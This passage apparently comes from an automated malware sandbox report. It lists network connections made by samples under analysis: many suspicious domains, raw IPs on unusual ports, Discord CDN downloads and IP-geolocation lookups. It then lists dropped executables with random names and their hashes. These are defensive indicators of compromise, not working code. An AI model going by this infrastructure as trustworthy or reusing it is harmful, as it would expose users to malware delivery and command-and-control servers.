| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 52.219.160.54:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 205.185.216.10:80 | tcp | |
| N/A | 204.79.197.203:80 | tcp | |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 52.219.156.6:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.6:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 37.0.10.214:80 | tcp | |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 172.67.72.12:443 | ipqualityscore.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.72.12:443 | ipqualityscore.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.244:80 | 37.0.10.244 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.72.12:443 | ipqualityscore.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 52.222.137.218:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | uyg5wye.2ihsfa.com | udp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.156.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 52.219.156.70:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 185.49.70.90:2080 | 185.49.70.90 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 52.219.160.14:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.160.14:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.152.223:52383 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 91.107.126.100:80 | afleof21klg.top | tcp |
| N/A | 91.107.126.100:80 | afleof21klg.top | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 52.178.182.73:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 40.126.31.137:443 | tcp | |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 131.253.33.219:443 | tcp | |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 131.253.33.203:443 | ntp.msn.com | tcp |
| N/A | 13.32.240.85:443 | tcp | |
| N/A | 2.22.22.208:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 81.16.141.193:80 | tcp | |
| N/A | 104.21.33.188:443 | source3.boys4dayz.com | tcp |
| N/A | 212.32.249.110:443 | tcp | |
| N/A | 3.229.58.197:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 2.18.105.186:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 131.253.33.203:443 | ntp.msn.com | tcp |
| N/A | 84.53.185.32:443 | tcp | |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 67.198.134.186:433 | tcp | |
| N/A | 172.67.137.37:443 | mybrowserinfo.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 142.250.179.174:80 | www.google-analytics.com | tcp |
| N/A | 127.0.0.1:5985 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 20.82.210.154:443 | tcp | |
| N/A | 54.224.34.30:443 | paybiz.herokuapp.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 23.51.123.27:80 | tl.symcd.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 204.79.197.203:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 2.22.22.219:443 | tcp | |
| N/A | 2.22.23.139:443 | tcp | |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 192.243.59.13:443 | tcp | |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 172.67.26.25:443 | tcp | |
| N/A | 172.67.72.9:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | tcp | |
| N/A | 2.22.147.96:443 | tcp | |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 5.252.194.220:443 | tcp | |
| N/A | 104.21.89.239:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 172.67.171.24:443 | tcp | |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 2.22.23.146:443 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 205.185.216.42:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 8.8.4.4:443 | dns.google | udp |
| N/A | 8.8.4.4:443 | dns.google | tcp |
| N/A | 139.45.197.236:80 | vexacion.com | tcp |
| N/A | 139.45.197.236:80 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 139.45.195.8:443 | tcp | |
| N/A | 139.45.195.8:80 | tcp | |
| N/A | 139.45.197.240:80 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 139.45.197.238:443 | tcp | |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 87.250.250.119:443 | tcp | |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 172.67.10.98:443 | tcp | |
| N/A | 139.45.197.251:443 | tcp | |
| N/A | 104.110.191.14:80 | repository.certum.pl | tcp |
| N/A | 139.45.197.159:443 | tcp | |
| N/A | 139.45.197.240:443 | tcp | |
| N/A | 87.250.250.119:443 | tcp | |
| N/A | 2.22.147.26:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 127.0.0.1:5985 | tcp |
Files
memory/3832-146-0x0000000004200000-0x000000000433F000-memory.dmp
memory/1648-149-0x0000000000000000-mapping.dmp
memory/1376-148-0x0000000000000000-mapping.dmp
memory/1600-147-0x0000000000000000-mapping.dmp
memory/1852-150-0x0000000000000000-mapping.dmp
memory/1880-151-0x0000000000000000-mapping.dmp
memory/3888-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe
| MD5 | 7714deedb24c3dcfa81dc660dd383492 |
| SHA1 | 56fae3ab1186009430e175c73b914c77ed714cc0 |
| SHA256 | 435badbad2fc138245a4771a74ebb9075658e294d1bcfcf191ccea466eea825c |
| SHA512 | 2cf05ac9470ab4e6d487ec9e4d7ab36fb2c8ce1405dba01b58934778829c7c4db703818087e0c5fbffe6cf821dfa190427e1205530409359ace2ad416e781c58 |
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
| MD5 | cfa84b10c7c5ff391859a425abae49e7 |
| SHA1 | 2aa794ec012ad2491b463c983b0a7b8a3beb72c4 |
| SHA256 | 07c1c45477b082547fe2b3ad9bea525ffca2aebc80bc6c96b1f263904db7fbd1 |
| SHA512 | f6b9ac777f9b357b4da4f5653f562631b55514516eb20c2fda63d85d15ed5d572e14887e5f0a10ebdc494188d2da3af7d53171159ef303719f12def0a4f8f5db |
C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe
| MD5 | 7714deedb24c3dcfa81dc660dd383492 |
| SHA1 | 56fae3ab1186009430e175c73b914c77ed714cc0 |
| SHA256 | 435badbad2fc138245a4771a74ebb9075658e294d1bcfcf191ccea466eea825c |
| SHA512 | 2cf05ac9470ab4e6d487ec9e4d7ab36fb2c8ce1405dba01b58934778829c7c4db703818087e0c5fbffe6cf821dfa190427e1205530409359ace2ad416e781c58 |
memory/2056-157-0x0000000000000000-mapping.dmp
memory/744-158-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe
| MD5 | ad9d32f656a53feb70f09fa54040b9c0 |
| SHA1 | dd4883dd089ef1490dc018eaaa6ed72b9b26f79b |
| SHA256 | f98183a2ad674f8aae6ad47e7da8b48c80175148ba333f0f57b3e6eca64bfaa6 |
| SHA512 | c24c3697bb5dc73d3f24caff4c2819d6bfb78061492b11f9c2e1e1abb9ad872903af64e14e3b973671906e985bd8011e838cbfe5cfabb615e31a39c5abe70a43 |
C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe
